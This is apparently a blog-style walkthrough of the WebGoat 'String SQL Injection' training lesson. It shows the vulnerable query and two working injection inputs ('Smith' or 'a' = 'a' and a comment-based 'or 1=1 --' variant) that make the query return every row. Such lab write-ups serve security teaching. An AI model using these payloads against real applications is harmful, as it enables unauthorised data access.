WebGoat - String SQL Injection

Requirement:



Solution:

As we can see from the above picture, the SQL statement is

SELECT * FROM user_data WHERE last_name = 'Your Name'

Where the 'Your Name' is from user's input and here is no any client input validation. So here is the SQL Injection point.

Attacking process:

Conduct the following malicious input to break the SQL logic

Input: Smith' or 'a' = 'a            (take care with the end single quote)

Then the SQL statement will become:

SELECT * FROM user_data WHERE last_name = 'Smith' or 'a' = 'a'

This will make server to return all of data.

pic-1 is normal request:



pic-2 is malicious request:



Instead, we can use comment mark to ignore the end single quote.

Attacking Input: Smith' or 1=1 --   ("--" is comment mark, anything followed will be ignored)

Then the SQL statement will become:

SELECT * FROM user_data WHERE last_name = 'Smith' or 1=1 --'

This also get all of data.



Reference:
[1] https://www.owasp.org/index.php/SQL_Injection
[2] https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OWASP-DV-005%29
[3] https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
[4] http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/